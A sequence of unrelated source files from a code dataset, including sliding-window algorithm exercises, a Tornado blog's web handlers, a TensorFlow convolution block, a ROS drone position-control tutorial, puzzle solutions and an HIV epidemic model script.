medium\n最多包含两个不同的字符,但是各字母的个数不限制\n\n\"eceba\"\n\nece\n\neceb -> ceb\nceba\n\n------\nouter e\n------\nouter ec\n------\nouter ece\n------\nouter eceb\ninner eceb\ninner ceb\n------\nouter eba\ninner eba\n3\n\n\"ccaabbb\"\n------\nouter c\n------\nouter cc\n------\nouter cca\n------\nouter ccaa\n------\nouter ccaab\ninner ccaab\ninner caab\n------\nouter aabb\n------\nouter aabbb\n5\n\n'''\nprint(lengthOfLongestSubstring(\"abcabcbb\"))\nprint(lengthOfLongestSubstringTwoDistinct('eceba'))\nprint(lengthOfLongestSubstringTwoDistinct(\"ccaabbb\"))\n\n\ndef lengthOfLongestSubstringKDistinct(s, k):\n\tfrom collections import defaultdict\n\tlookup = defaultdict(int)\n\tstart = 0\n\tend = 0\n\tmax_len = 0\n\tcounter = 0\n\twhile end < len(s):\n\t\tif lookup[s[end]] == 0:\n\t\t\tcounter += 1\n\t\tlookup[s[end]] += 1\n\t\tend += 1\n\t\twhile counter > k:\n\t\t\tif lookup[s[start]] == 1:\n\t\t\t\tcounter -= 1\n\t\t\tlookup[s[start]] -= 1\n\t\t\tstart += 1\n\t\tmax_len = max(max_len, end - start)\n\treturn max_len\n\n'''\n340. 至多包含 K 个不同字符的最长子串\n'''\nprint(lengthOfLongestSubstringKDistinct('abcabcbb',1))\n\n'''\n76. 
最小覆盖子串 hard\n\n输入: S = \"ADOBECODEBANC\", T = \"ABC\"\n输出: \"BANC\"\n\n'''\n\n\ndef minWindow( s, t):\n\tfrom collections import defaultdict\n\timport sys\n\tlookup = defaultdict(int)\n\tfor c in t:\n\t\tlookup[c] += 1\n\ti, j = 0, 0\n\tcounter = len(t)\n\tmin_length = float('inf')\n\tans = ''\n\n\twhile j < len(s):\n\t\tprint('------')\n\t\tprint('outer ', s[i:j + 1],lookup,'counter:',counter)\n\t\tif lookup[s[j]] > 0:\n\t\t\tcounter -= 1\n\t\tlookup[s[j]] -= 1\n\t\tj += 1\n\t\twhile counter == 0:\n\t\t\tprint('inner ', s[i:j],lookup,'counter:',counter)\n\t\t\tif min_length > j - i:\n\t\t\t\tmin_length = j - i\n\t\t\t\tans = s[i:j]\n\t\t\tif lookup[s[i]] == 0:\n\t\t\t\tcounter += 1\n\t\t\tlookup[s[i]] += 1\n\t\t\ti += 1\n\treturn ans\nprint(minWindow('ADOBECODEBANC','ABC'))\nl = [1,2,3,4]\nprint(l[0:])","sub_path":"sliding_window.py","file_name":"sliding_window.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"541950255","text":"\"\"\"Web frontend for motor-blog: actually show web pages to visitors\n\"\"\"\n\nimport datetime\nimport email.utils\nimport functools\nimport time\n\nimport tornado.web\nfrom tornado import gen\nfrom tornado.options import options as opts\nfrom werkzeug.contrib.atom import AtomFeed\n\nfrom motor_blog.models import Post, Category\nfrom motor_blog import cache, models\nfrom motor_blog.text.link import absolute\nfrom motor_blog.web.lytics import ga_track_event_url\n\n\n__all__ = (\n # Web\n 'HomeHandler', 'PostHandler', 'AllPostsHandler',\n 'CategoryHandler', 'TagHandler', 'SearchHandler',\n\n # Atom\n 'FeedHandler',\n)\n\n# TODO: cache-control headers\n\n\nclass MotorBlogHandler(tornado.web.RequestHandler):\n def initialize(self, **kwargs):\n super(MotorBlogHandler, self).initialize(**kwargs)\n self.categories = []\n self.db = self.settings['db']\n\n def get_template_namespace(self):\n ns = super(MotorBlogHandler, self).get_template_namespace()\n\n def get_setting(setting_name):\n return self.application.settings[setting_name]\n\n # TODO: use ui_methods instead of this\n ns.update({\n 'q': '',\n 'setting': get_setting,\n 'categories': self.categories,\n 'absolute': absolute})\n\n return ns\n\n def head(self, *args, **kwargs):\n # We need to generate the full content for a HEAD request in order\n # to calculate Content-Length. 
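The four solutions in the sliding-window snippet above share one counter-based skeleton; isolated, it looks like this (an illustrative generic version, not code from the snippet itself):

```python
from collections import defaultdict

def longest_window(s: str, k: int) -> int:
    # 'Longest substring with at most k distinct characters' skeleton,
    # the shape shared by all the solutions above.
    lookup = defaultdict(int)
    start = best = distinct = 0
    for end, ch in enumerate(s):
        if lookup[ch] == 0:
            distinct += 1
        lookup[ch] += 1
        while distinct > k:
            lookup[s[start]] -= 1
            if lookup[s[start]] == 0:
                distinct -= 1
            start += 1
        best = max(best, end - start + 1)
    return best

print(longest_window('eceba', 2))     # 3
print(longest_window('ccaabbb', 2))   # 5
```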
Tornado knows this is a HEAD and omits\n # the content.\n self.get(*args, **kwargs)\n\n def get_current_user(self):\n \"\"\"Logged-in username or None\"\"\"\n return self.get_secure_cookie('auth')\n\n def get_login_url(self):\n return self.reverse_url('login')\n\n @cache.cached(key='categories', invalidate_event='categories_changed')\n @gen.coroutine\n def get_categories(self):\n cursor = self.db.categories.find().sort('name')\n category_docs = yield cursor.to_list(100)\n\n raise gen.Return(category_docs)\n\n @gen.coroutine\n def get_posts(self, *args, **kwargs):\n raise NotImplementedError()\n\n def compute_etag(self):\n # Don't waste time md5summing the output, we'll rely on the\n # Last-Modified header\n # TODO: what's the cost?\n return None\n\n\n# TODO: ample documentation, refactor\ndef check_last_modified(get):\n @functools.wraps(get)\n @gen.coroutine\n def _get(self, *args, **kwargs):\n category_docs = yield self.get_categories()\n self.categories = categories = [\n Category(**doc) for doc in category_docs]\n\n post_docs = yield self.get_posts(*args, **kwargs)\n if post_docs:\n self.posts = posts = [\n Post(**doc) if doc else None\n for doc in post_docs]\n else:\n self.posts = posts = []\n\n if posts or categories:\n mod = max(\n thing.last_modified\n for things in (posts, categories)\n for thing in things if thing)\n\n # If-Modified-Since header is only good to the second. Truncate\n # our own mod-date to match its precision.\n mod = mod.replace(microsecond=0)\n self.set_header('Last-Modified', mod)\n\n # Adapted from StaticFileHandler\n ims_value = self.request.headers.get(\"If-Modified-Since\")\n if ims_value is not None:\n date_tuple = email.utils.parsedate(ims_value)\n if_since = models.utc_tz.localize(\n datetime.datetime.fromtimestamp(time.mktime(date_tuple)))\n if if_since >= mod:\n # No change since client's last request. Tornado will take\n # care of the rest.\n self.set_status(304)\n self.finish()\n return\n\n # Yielding, and returning result, are unneeded. We're not waiting for\n # a return value, we're waiting for get() to call finish(). 
But let's\n # yield and return anyway for sanity's sake.\n result = yield gen.coroutine(get)(self, *args, **kwargs)\n raise gen.Return(result)\n\n return _get\n\n\nclass HomeHandler(MotorBlogHandler):\n @gen.coroutine\n def get_posts(self, page_num=0):\n cursor = (self.db.posts.find(\n {'status': 'publish', 'type': 'post'},\n {'original': False},\n ).sort([('pub_date', -1)])\n .skip(int(page_num) * 10)\n .limit(10))\n\n result = yield cursor.to_list(100)\n raise gen.Return(result)\n\n @tornado.web.addslash\n @check_last_modified\n def get(self, page_num=0):\n self.render(\n 'home.jade',\n posts=self.posts, categories=self.categories,\n page_num=int(page_num))\n\n\nclass AllPostsHandler(MotorBlogHandler):\n @gen.coroutine\n def get_posts(self):\n cursor = (self.db.posts.find(\n {'status': 'publish', 'type': 'post'},\n {'original': False},\n )\n .sort([('pub_date', -1)]))\n\n results = yield cursor.to_list(100)\n raise gen.Return(results)\n\n @tornado.web.addslash\n @check_last_modified\n def get(self):\n self.render(\n 'all-posts.jade',\n posts=self.posts, categories=self.categories)\n\n\nclass PostHandler(MotorBlogHandler):\n \"\"\"Show a single blog post or page\"\"\"\n @gen.coroutine\n def get_posts(self, slug):\n slug = slug.rstrip('/')\n posts = self.db.posts\n postdoc = yield posts.find_one(\n {'slug': slug, 'status': 'publish'},\n {'summary': False, 'original': False})\n\n if not postdoc:\n raise tornado.web.HTTPError(404)\n\n if postdoc['type'] == 'redirect':\n # This redirect marks where a real post or page used to be.\n # Send the client there. Note we don't run the callback; we're\n # done.\n url = self.reverse_url('post', postdoc['redirect'])\n self.redirect(url, permanent=True)\n return\n\n # Only posts have prev / next navigation, not pages\n elif postdoc['type'] == 'post':\n fields = {'summary': False, 'body': False, 'original': False}\n prev_doc_future = posts.find_one({\n 'status': 'publish', 'type': 'post',\n 'pub_date': {'$lt': postdoc['pub_date']}\n }, fields, sort=[('pub_date', -1)])\n\n next_doc_future = posts.find_one({\n 'status': 'publish', 'type': 'post',\n 'pub_date': {'$gt': postdoc['pub_date']}\n }, fields, sort=[('pub_date', 1)])\n\n # Overkill for this case, but in theory we reduce latency by\n # querying for previous and next posts at once, and waiting for\n # both.\n prevdoc, nextdoc = yield [prev_doc_future, next_doc_future]\n else:\n prevdoc, nextdoc = None, None\n\n # Done\n raise gen.Return([prevdoc, postdoc, nextdoc])\n\n @tornado.web.addslash\n @check_last_modified\n def get(self, slug):\n prev_post, post, next_post = self.posts\n self.render(\n 'single.jade',\n post=post,\n prev=prev_post,\n next=next_post,\n categories=self.categories)\n\n\nclass CategoryHandler(MotorBlogHandler):\n \"\"\"Page of posts for a category\"\"\"\n @gen.coroutine\n def get_posts(self, slug, page_num=0):\n page_num = int(page_num)\n slug = slug.rstrip('/')\n cursor = (self.db.posts.find({\n 'status': 'publish',\n 'type': 'post',\n 'categories.slug': slug,\n }, {\n 'original': False\n }).sort(\n [('pub_date', -1)]\n ).skip(page_num * 10).limit(10))\n\n results = yield cursor.to_list(100)\n raise gen.Return(results)\n\n @tornado.web.addslash\n @check_last_modified\n def get(self, slug, page_num=0):\n page_num = int(page_num)\n slug = slug.rstrip('/')\n for this_category in self.categories:\n if this_category.slug == slug:\n break\n else:\n raise tornado.web.HTTPError(404)\n\n self.render(\n 'category.jade',\n posts=self.posts, categories=self.categories,\n 
this_category=this_category, page_num=page_num)\n\n\n# TODO: move to feed.py\nclass FeedHandler(MotorBlogHandler):\n @gen.coroutine\n def get_posts(self, slug=None):\n query = {'status': 'publish', 'type': 'post'}\n\n if slug:\n slug = slug.rstrip('/')\n query['categories.slug'] = slug\n\n cursor = (self.db.posts.find(\n query,\n {'summary': False, 'original': False},\n ).sort([('pub_date', -1)])\n .limit(20))\n\n results = yield cursor.to_list(100)\n raise gen.Return(results)\n\n @check_last_modified\n def get(self, slug=None):\n if slug:\n slug = slug.rstrip('/')\n\n this_category = None\n if slug:\n # Get all the categories and search for one with the right slug,\n # instead of actually querying for the right category, since\n # get_categories() is cached.\n slug = slug.rstrip('/')\n for category in self.categories:\n if category.slug == slug:\n this_category = category\n break\n else:\n raise tornado.web.HTTPError(404)\n\n title = opts.blog_name\n\n if this_category:\n title = '%s - Posts about %s' % (title, this_category.name)\n\n author = {'name': opts.author_display_name, 'email': opts.author_email}\n if this_category:\n feed_url = absolute(\n self.reverse_url('category-feed', this_category.slug))\n else:\n feed_url = absolute(self.reverse_url('feed'))\n\n if self.posts:\n updated = max(max(p.mod, p.date_created) for p in self.posts)\n else:\n updated = datetime.datetime.now(tz=self.application.settings['tz'])\n\n # referer = self.request.headers.get('referer', '-') # (sic)\n icon = absolute(\n self.reverse_url('theme-static', '/theme/static/square96.png'))\n\n generator = (\n 'Motor-Blog', 'https://github.com/ajdavis/motor-blog', '0.1')\n\n feed = AtomFeed(\n title=title,\n feed_url=feed_url,\n url=absolute(self.reverse_url('home')),\n author=author,\n updated=updated,\n # TODO: customizable icon, also a 'logo' kwarg\n icon=icon,\n generator=generator)\n\n for post in self.posts:\n url = absolute(self.reverse_url('post', post.slug))\n tracking_pixel_url = ga_track_event_url(self.application, url)\n tracking_pixel = '' \\\n % tracking_pixel_url\n\n feed.add(\n title=post.title,\n content=post.body + tracking_pixel,\n content_type='html',\n summary=post.summary,\n author=author,\n url=url,\n id=url,\n published=post.date_created,\n # Don't update 'updated' - it seems to make Planet Python\n # re-post my updated items, which is spammy.\n #updated=post.mod,\n updated=post.date_created,\n )\n\n self.set_header('Content-Type', 'application/atom+xml; charset=UTF-8')\n self.write(unicode(feed))\n self.finish()\n\n\nclass TagHandler(MotorBlogHandler):\n \"\"\"Page of posts for a tag\"\"\"\n @gen.coroutine\n def get_posts(self, tag, page_num=0):\n page_num = int(page_num)\n tag = tag.rstrip('/')\n cursor = (self.db.posts.find({\n 'status': 'publish',\n 'type': 'post',\n 'tags': tag,\n }, {\n 'original': False\n }).sort([('pub_date', -1)]).skip(page_num * 10).limit(10))\n\n results = yield cursor.to_list(100)\n raise gen.Return(results)\n\n @tornado.web.addslash\n @check_last_modified\n def get(self, tag, page_num=0):\n page_num = int(page_num)\n tag = tag.rstrip('/')\n self.render(\n 'tag.jade',\n posts=self.posts, categories=self.categories,\n this_tag=tag, page_num=page_num)\n\n\nclass SearchHandler(MotorBlogHandler):\n @gen.coroutine\n def get(self):\n # TODO: refactor with check_last_modified(), this is gross\n # we need an async version of RequestHandler.prepare()\n category_docs = yield self.get_categories()\n self.categories = [Category(**doc) for doc in category_docs]\n\n q = 
self.get_argument('q', None)\n if q:\n response = yield self.db.command(\n 'text',\n 'posts',\n search=q,\n filter={'status': 'publish', 'type': 'post'},\n projection={'original': False, 'plain': False},\n limit=50)\n\n posts = [Post(**result['obj']) for result in response['results']]\n else:\n posts = []\n self.render('search.jade', q=q, posts=posts)\n","sub_path":"motor_blog/web/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":13233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"270207994","text":"## CONV BLOCK for resnet\nfrom __future__ import division,print_function\nimport numpy as np\nimport tensorflow as tf \nimport matplotlib.pyplot as plt\n\n\nclass ConvBlock(object):\n \n #layers contains parameter for each layer in the format\n #layers = [(),(),..,()]\n #where () => (input_height/width,#input channels,#output channels,#stride,padding)\n def __init__(self,layers,block_name):\n self.block_name = block_name\n self.layers = layers\n self.block_params = []\n self.n = len(layers)\n #main branch \n for i in range(self.n):\n layer = layers[i]\n filter_sz = [layer[0],layer[0],layer[1],layer[2]]\n print('layer : ',i,'filter sz : ',filter_sz)\n W = tf.Variable(initial_value=tf.random_normal(filter_sz,dtype = tf.float32))\n self.block_params.append(W)\n print(self.block_params)\n #shortcut branch \n first_input_size = self.layers[0][1]\n last_output_size = self.layers[-1][2]\n self.Ws = tf.Variable(initial_value=tf.random_normal([1,1,first_input_size,last_output_size],dtype = tf.float32))\n \n \n def predict(self,X):\n output = X\n short_output = tf.nn.conv2d(output,self.Ws,strides = [1,1,1,1],padding = \"VALID\")\n short_output = tf.layers.batch_normalization(short_output)\n for i in range(self.n):\n W = self.block_params[i]\n layer = self.layers[i]\n stride = [1,layer[3],layer[3],1]\n output = tf.nn.conv2d(output,W,strides=stride,padding = layer[4])\n output = tf.layers.batch_normalization(output)\n print(output.shape)\n if i != (self.n-1):\n output = tf.nn.relu(output)\n output = tf.add(output,short_output)\n return output\n \n \nif __name__ == '__main__':\n layers = [(1,3,12,1,'VALID'),(3,12,12,1,'SAME'),(1,12,24,1,'VALID')]\n conv_block = ConvBlock(layers,'Test block')\n \n X = np.random.random((1,224,224,3)).astype(np.float32)\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n output = conv_block.predict(X)\n print('Output shape : ',output.shape)\n","sub_path":"resnet/legacy/conv_block0.py","file_name":"conv_block0.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"15401942","text":"import numpy as np\nimport matplotlib.pyplot as mp\n\n# 设置中文字体\nmp.rcParams['font.sans-serif'] = ['SimHei']\n# mp.rcParams['axes.unicode_minus'] = False\n\n\n#otss = np.array([0.079,0.096, 0.099, 0.066,0.0735,0.154])\ngtss = np.array([0.05757,0.05308,0.05785, 0.03980, 0.06920,0.15587,0.07222833])\n#mp.figure('Bar Chart', facecolor='lightgray')\n#mp.title('Bar Chart', fontsize=16)\nmp.xlabel('Models', fontsize=18)\nmp.ylabel('Mean Relative Error', fontsize=18)\nmp.tick_params(labelsize=16)\nmp.grid(linestyle=':', axis='y')\nx = np.arange(7)\n#a = mp.bar(x - 0.2, otss, 0.3, color='dodgerblue', label='O-TSS', align='center')\nb = mp.bar(x , gtss, 0.3, color='orangered', label='TSS', align='center')\n# 设置标签\nfor i in b:\n h = i.get_height()\n mp.text(i.get_x() + i.get_width() / 2, h, 
'%2.5f' % (h), ha='center', va='bottom',size='10')\nmp.xticks(x, ['Gemm', 'Dsyrk', 'Dsyr2k', 'Tmm', 'Trmm', 'Matmul','AVG'])\nmp.ylim(0,0.2)\nmp.legend()\nmp.show()","sub_path":"Visualization(Serial)/relative error.py","file_name":"relative error.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"552379240","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# 例程简介: 讲解如何调用uav_control的接口实现无人机ENU坐标系下的位置控制\n# 效果说明: 无人机起飞移动到目标位置点,悬停30秒后降落\n# 备注:该例程仅支持Prometheus仿真,真机测试需要熟练掌握相关接口的定义后以及真机适配修改后使用\nfrom math import fabs\nfrom turtle import position\nimport ros\nimport rospy\nfrom prometheus_msgs.msg import UAVCommand, UAVControlState, UAVState\n\n# 创建无人机相关数据变量\nuav_control_state_sv = UAVControlState()\nuav_command_pv = UAVCommand()\nuav_state_sv = UAVState()\n\n# 无人机状态回调函数\ndef uavStateCb(msg):\n global uav_state_sv\n uav_state_sv = msg\n\n# 无人机控制状态回调函数\ndef uavControlStateCb(msg):\n global uav_control_state_sv\n uav_control_state_sv = msg\n\n# 主函数\ndef main():\n # ROS初始化,设定节点名\n rospy.init_node('body_xyz_pos_control',anonymous=True)\n # 创建命令发布标志位,命令发布则为true;初始化为false\n cmd_pub_flag = False\n # 创建无人机控制命令发布者\n UavCommandPb = rospy.Publisher(\"/uav1/prometheus/command\", UAVCommand, queue_size =10)\n # 创建无人机控制状态命令订阅者\n rospy.Subscriber(\"/uav1/prometheus/control_state\", UAVControlState, uavControlStateCb)\n # 创建无人机状态命令订阅者\n rospy.Subscriber(\"/uav1/prometheus/state\", UAVState, uavStateCb)\n # 循环频率设置为1HZ\n rate = rospy.Rate(1)\n while not rospy.is_shutdown():\n # 检测无人机是否处于[COMMAND_CONTROL]模式\n if uav_control_state_sv.control_state == UAVControlState.COMMAND_CONTROL:\n # 检测控制命令是否发布,没有发布则进行命令的发布\n if not cmd_pub_flag:\n # 时间戳\n uav_command_pv.header.stamp = rospy.Time.now()\n # 坐标系\n uav_command_pv.header.frame_id = 'ENU'\n # Init_Pos_Hover初始位置悬停,可在uav_control_indoor.yaml或uav_control_outdoor.yaml文件设置无人机悬停高度\n uav_command_pv.Agent_CMD = 1\n # 发布的命令ID,每发一次,该ID加1\n uav_command_pv.Command_ID = 1\n # 发布起飞命令\n UavCommandPb.publish(uav_command_pv)\n rate.sleep()\n # 命令发布标志位置为true\n cmd_pub_flag = True\n # 打印无人机起飞相关信息\n rospy.loginfo(\"Takeoff_height: %d\", rospy.get_param('/uav_control_main_1/control/Takeoff_height'))\n else:\n # 当无人机距离高度目标值±0.1米范围内时认为起飞完\n if fabs(uav_state_sv.position[2] - rospy.get_param('/uav_control_main_1/control/Takeoff_height')) <= 0.1:\n print(\" UAV takeoff successfully and move body position control\")\n rospy.sleep(5)\n # 时间戳\n uav_command_pv.header.stamp = rospy.Time.now()\n # 坐标系\n uav_command_pv.header.frame_id = \"BODY\"\n # Move模式\n uav_command_pv.Agent_CMD = UAVCommand.Move\n # Move_mode\n uav_command_pv.Move_mode = UAVCommand.XYZ_POS_BODY\n # BODY坐标系下的X轴正半轴对应东方,Y轴正半轴对应北方,因此下面的控制数据将会控制无人机在5米的高度移动(2,2,2)\n uav_command_pv.position_ref[0] = 2\n uav_command_pv.position_ref[1] = 2\n uav_command_pv.position_ref[2] = 2\n uav_command_pv.yaw_ref = 0\n # 发布的命令ID加1\n uav_command_pv.Command_ID += 1\n # 发布命令\n UavCommandPb.publish(uav_command_pv)\n rospy.loginfo(\"UAV move body position control and landed after 10 seconds\")\n rospy.sleep(10)\n # 时间戳\n uav_command_pv.header.stamp = rospy.Time.now()\n # 坐标系\n uav_command_pv.header.frame_id = \"ENU\"\n # Land降落,从当前位置降落至地面并自动上锁\n uav_command_pv.Agent_CMD = 3\n # 发布的命令ID加1\n uav_command_pv.Command_ID += 1\n # 发布降落命令\n UavCommandPb.publish(uav_command_pv)\n # 打印降落相关信息\n rospy.loginfo(\"[body_xyz_pos_control] tutorial_demo completed\")\n # 任务结束,关闭该节点\n rospy.signal_shutdown(\"shutdown time\")\n else:\n # 打印当前无人机高度信息\n rospy.loginfo(\"UAV 
height : %f [m]\", uav_state_sv.position[2])\n rospy.sleep(1)\n else:\n # 在控制命令发布后,但无人机未结束任务的情况下,此时无人机未处于[COMMAND_CONTROL]控制状态,认为无人机出现意外情况,任务中止\n if cmd_pub_flag:\n rospy.logfatal(\" Unknown error! [body_xyz_pos_control] tutorial_demo aborted\")\n # 命令未发布,等待无人机进入[COMMAND_CONTROL]状态\n else:\n rospy.logwarn(\" Wait for UAV to enter [COMMAND_CONTROL] MODE \")\n rospy.sleep(2)\n rate.sleep()\n rospy.spin()\n\nif __name__ == \"__main__\":\n try:\n main()\n except rospy.ROSInterruptException:\n pass","sub_path":"Modules/tutorial_demo/basic/body_xyz_pos_control/scripts/body_xyz_pos_control.py","file_name":"body_xyz_pos_control.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"353009931","text":"\nimport collections\nimport re\nimport glob\n\nfiles = glob.glob('*')\nwords = []\nfor f in files:\n with open(f) as f:\n words += re.findall(r'\\w+',f.read().lower())\nfor word,num in collections.Counter(words).most_common(10):\n print(\"{0} -> {1}\".format(word,num))\n","sub_path":"python/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"239786219","text":"kwadraty = []\nfor x in range(10):\n kwadraty.append(x**2)\nprint(kwadraty)\n\n\"\"\"\nPętla to podstawowa konstrukcja wykorzystywana w językach programowania. \nPython oferuje różne sposoby powtarzania wykonywania określonych operacji, niekiedy wygodniejsze lub zwięźlejsze niż pętle. \nSą to przede wszystkim generatory wyrażeń i wyrażenia listowe, a także funkcje map() i filter().\n\"\"\"","sub_path":"Files/1.5.2_pętle.py","file_name":"1.5.2_pętle.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"31332110","text":"import heapq\n\n\n__author__ = 'Aaron Hosford'\n__all__ = [\n 'iter_combinations',\n 'PriorityQueue',\n 'PrioritySet',\n]\n\n\ndef iter_combinations(sequence_list, index=0):\n if index < len(sequence_list):\n for item in sequence_list[index]:\n for tail in iter_combinations(sequence_list, index + 1):\n yield [item] + tail\n else:\n yield []\n\n\nclass PriorityQueue:\n\n def __init__(self, values=None, key=None):\n self._values = []\n self._key = key\n self._counter = 0\n if values:\n for value in values:\n self.push(value)\n\n def __len__(self):\n return len(self._values)\n\n def __bool__(self):\n return bool(self._values)\n\n def __iter__(self):\n # Does NOT iterate in priority order!\n return iter(self._values)\n\n def push(self, value):\n # print(\"Pushing \" + repr(value))\n if self._key is None:\n heapq.heappush(self._values, (value, self._counter))\n else:\n heapq.heappush(self._values,\n (self._key(value), self._counter, value))\n self._counter += 1\n\n def pop(self):\n if self._key is None:\n value, counter = heapq.heappop(self._values)\n else:\n key, counter, value = heapq.heappop(self._values)\n if not self._values:\n self._counter = 0\n # print(\"Popping \" + repr(value))\n return value\n\n\nclass PrioritySet:\n def __init__(self, values=None, key=None):\n self._queue = PriorityQueue(key=key)\n self._values = set()\n if values is not None:\n for value in values:\n self.push(value)\n\n def __len__(self):\n return len(self._values)\n\n def __bool__(self):\n return bool(self._values)\n\n def __iter__(self):\n # Does NOT iterate in priority order!\n return iter(self._values)\n\n def push(self, value):\n if 
value in self._values:\n return\n self._queue.push(value)\n self._values.add(value)\n\n def pop(self):\n value = self._queue.pop()\n self._values.remove(value)\n return value\n","sub_path":"pyramids/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"353367841","text":"test_n = int(input())\n\nfor n in range(test_n):\n\n col_n = int(input())\n row1 = list(map(int, input().split(\" \")[:col_n]))\n row2 = list(map(int, input().split(\" \")[:col_n]))\n score = [row1, row2]\n\n d = [[0, score[0][0], score[1][0]]]\n for i in range(1, col_n):\n d.append([max(d[i-1]), score[0][i] + max(d[i-1][0], d[i-1][2]), score[1][i] + max(d[i-1][0], d[i-1][1])])\n\n print(max(d[-1]))","sub_path":"20190816_BJ9465.py","file_name":"20190816_BJ9465.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"382097192","text":"pos = [(0, 2), (2, 0), (2, 4), (3, 2), (5, 0), (5, 4), (6, 2)]\nfind = { int('1110111', 2): '0', \n int('0100100', 2): '1',\n int('1011101', 2): '2',\n int('1101101', 2): '3',\n int('0101110', 2): '4',\n int('1101011', 2): '5',\n int('1111011', 2): '6',\n int('0100101', 2): '7',\n int('1111111', 2): '8',\n int('1101111', 2): '9' }\n\ndef get_digit(strs, start):\n if strs[2][start + 2] == 'x':\n return '+'\n\n p = 1\n mask = 0\n for x in pos:\n if strs[x[0]][start + x[1]] == 'x':\n mask |= p\n\n p <<= 1\n\n return find[mask]\n\ndef draw_horiz(grid, row, idx):\n for i in range(5):\n grid[row][i + idx] = 'x'\n\ndef draw_vert_top(grid, col):\n for i in range(4):\n grid[i][col] = 'x'\n\ndef draw_vert_bot(grid, col):\n for i in range(3, 7):\n grid[i][col] = 'x'\n\ndef add_digit(grid, idx, c):\n if c not in '14':\n draw_horiz(grid, 0, idx)\n\n if c not in '017':\n draw_horiz(grid, 3, idx)\n\n if c not in '147':\n draw_horiz(grid, 6, idx)\n\n if c in '045689':\n draw_vert_top(grid, idx)\n\n if c not in '56':\n draw_vert_top(grid, idx + 4)\n\n if c in '0268':\n draw_vert_bot(grid, idx)\n\n if c in '013456789':\n draw_vert_bot(grid, idx + 4)\n\ndef handle(ans):\n s = str(ans)\n grid = [['.' for _ in range(len(s) * 6 - 1)] for _ in range(7)]\n\n idx = 0\n for c in s:\n add_digit(grid, idx, c)\n idx += 6\n\n for row in grid:\n print(''.join(row))\n\ndef main():\n strs = []\n for _ in range(7):\n strs.append(input())\n\n cols = len(strs[0])\n first = []\n second = []\n in_first = True\n\n for x in range(0, cols, 6):\n d = get_digit(strs, x)\n if d == '+':\n in_first = False\n else:\n if in_first:\n first.append(d)\n else:\n second.append(d)\n\n a = int(''.join(first))\n b = int(''.join(second))\n\n ans = a + b\n handle(ans)\n\nmain()\n","sub_path":"kattis/asciiaddition.py","file_name":"asciiaddition.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"489814563","text":"\n\"\"\"\nSee what's going on with PLHIV in Cote d'Ivoire\n\"\"\"\n\nfrom pylab import *\n\nwho = 'cliff'\n\nimport sys\nif who=='robyn': sys.path.append('/Users/robynstuart/Documents/Optima2/server/src/sim')\nif who=='cliff': sys.path.append('/u/cliffk/unsw/optima2/server/src/sim')\n\n# Global settings\nverbose = 2\nexportdata = 0\n\nprint('\\n\\n\\n1. 
Load a project...')\nif who=='robyn': origfile = '/Users/gaest/Documents/JSONs/20151124_CI_noDeaths.json'\nif who=='cliff': origfile = '/u/cliffk/unsw/applications/cotedivoire/20151124_CI_noDeaths.json'\n\nfrom dataio import loaddata\nD = loaddata(origfile)\nfrom runsimulation import runsimulation\nD = runsimulation(D, makeplot = 0, dosave = False)\n\n#print('\\n\\n\\n2. Make a copy...')\n#from copy import deepcopy\n#newD = deepcopy(D)\n#\n#print('\\n\\n\\n3. Change population growth and rerun...')\n#newD['opt']['growth'] = .024\n#\n#from makedatapars import makedatapars\n#from makemodelpars import makemodelpars\n#\n#newD = makedatapars(newD, verbose=verbose) # Update parameters\n#newD['M'] = makemodelpars(newD['P'], newD['opt'], verbose=verbose)\n#newD = runsimulation(newD, makeplot = 0, dosave = False)\n\ntvec = D['S']['tvec']\n#newtvec = newD['S']['tvec']\n\n\n\n\n\n#leg = 'Pop growth 0%','Pop growth 2.4%'\n#\n#figure()\n#hold(True)\n#plot(tvec, D['S']['death'].sum(axis=(0)))\n#plot(newtvec, newD['S']['death'].sum(axis=(0)))\n#xlabel('Year')\n#ylabel('Deaths')\n#title('Deaths', fontsize=10)\n#legend(leg, loc=4)\n#\n#figure()\n#hold(True)\n#plot(tvec, D['S']['inci'].sum(axis=(0)))\n#plot(newtvec, newD['S']['inci'].sum(axis=(0)))\n#xlabel('Year')\n#ylabel('Infections')\n#title('Infections', fontsize=10)\n#legend(leg, loc=4)\n#\n#figure()\n#hold(True)\n#plot(tvec, D['S']['people'][1:,:,:].sum(axis=(0,1)))\n#plot(newtvec, newD['S']['people'][1:,:,:].sum(axis=(0,1)))\n#xlabel('Year')\n#ylabel('PLHIV')\n#title('PLHIV', fontsize=10)\n#legend(leg, loc=4)\n#\n#figure()\n#hold(True)\n#plot(tvec[1:-1],D['S']['newpeople'][:,1:-1].sum(axis=(0)))\n#plot(newtvec[1:-1],newD['S']['newpeople'][:,1:-1].sum(axis=(0)))\n#xlabel('Year')\n#xlabel('People')\n#title('Number of extra people added per time step', fontsize=10)\n#legend(leg, loc=4)\n\n\n\ninfections = D['S']['inci'].sum(axis=0)\ndeaths = D['S']['death'].sum(axis=0)\nplhiv = 